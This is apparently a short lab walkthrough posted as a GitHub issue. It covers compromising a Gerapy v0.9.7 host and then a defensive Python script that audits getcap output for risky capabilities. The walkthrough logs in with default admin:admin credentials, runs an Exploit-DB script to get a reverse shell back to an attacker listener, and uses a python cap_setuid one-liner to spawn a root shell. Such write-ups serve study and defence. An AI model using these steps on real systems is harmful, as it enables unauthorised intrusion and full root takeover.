Open WDavid404 opened 4 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8000/tcp open http-alt syn-ack ttl 61 WSGIServer/0.2 CPython/3.10.6
|_http-cors: GET POST PUT DELETE OPTIONS PATCH
|_http-server-header: WSGIServer/0.2 CPython/3.10.6
| http-methods:
|_ Supported Methods: OPTIONS GET
|_http-title: Gerapy
http://192.168.207.24:8000 --> Can log in with admin:admin --> Gerapy v0.9.7
Search for a Gerapy v0.9.7 exploit --> https://www.exploit-db.com/exploits/50640
To use this exploit .py file, a new project needs to be created first,
then run python3 50640.py -t 192.168.207.24 -p 8000 -L 192.168.45.180 -P 80
Got a reverse shell from the target host
linpeas: /usr/bin/python3.10 cap_setuid=ep
According to GTFOBins:
/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Key points:
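The linpeas finding above is a file capability set on an interpreter. As an added example (not part of the original post), this Python script parses `getcap -r` output in both the newer `path cap=ep` and older `path = cap+ep` layouts and flags such entries for a defender auditing a host. The capability watch-list, the interpreter name pattern and the sample lines are assumptions constructed for illustration.

```python
import os
import re

# Capabilities that allow changing identity or bypassing file permission checks.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
# Binaries that execute caller-supplied code, so any capability is usable at will.
INTERPRETER = re.compile(r"^(python|perl|ruby|php|node|lua|bash|sh|gdb|vim?)[\d.]*$")
# 'path cap_x=ep' (libcap >= 2.41) or 'path = cap_x+ep' (older libcap).
LINE = re.compile(r"^(?P<path>.+?)(?: =)? (?P<spec>cap_[a-z_,]+[=+][eip]+.*)$")
CLAUSE = re.compile(r"([a-z_,]+)[=+]([eip]+)")

def parse_getcap(text):
    """Yield (path, {capability: set_of_flags}) for each line of getcap output."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        caps = {}
        for clause in m.group("spec").split():
            c = CLAUSE.fullmatch(clause)  # simplification: '-' (drop) clauses are ignored
            if c:
                for name in c.group(1).split(","):
                    caps.setdefault(name, set()).update(c.group(2))
        yield m.group("path"), caps

def audit(text):
    """Return [(path, risky_caps, severity)] for files with a dangerous permitted capability."""
    findings = []
    for path, caps in parse_getcap(text):
        risky = sorted(n for n, flags in caps.items() if n in DANGEROUS and "p" in flags)
        if risky:
            critical = INTERPRETER.match(os.path.basename(path)) is not None
            findings.append((path, risky, "critical" if critical else "review"))
    return findings

# Constructed sample of `getcap -r / 2>/dev/null` output (not taken from the target host).
SAMPLE = """\
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet = cap_net_raw+ep
/opt/tools/backup = cap_dac_read_search,cap_chown+ep
"""

if __name__ == "__main__":
    for path, caps, severity in audit(SAMPLE):
        print(f"[{severity}] {path}: {','.join(caps)}")
```

On a real host, feed it the output of `getcap -r / 2>/dev/null`; `setcap -r <path>` removes the capabilities from a flagged file.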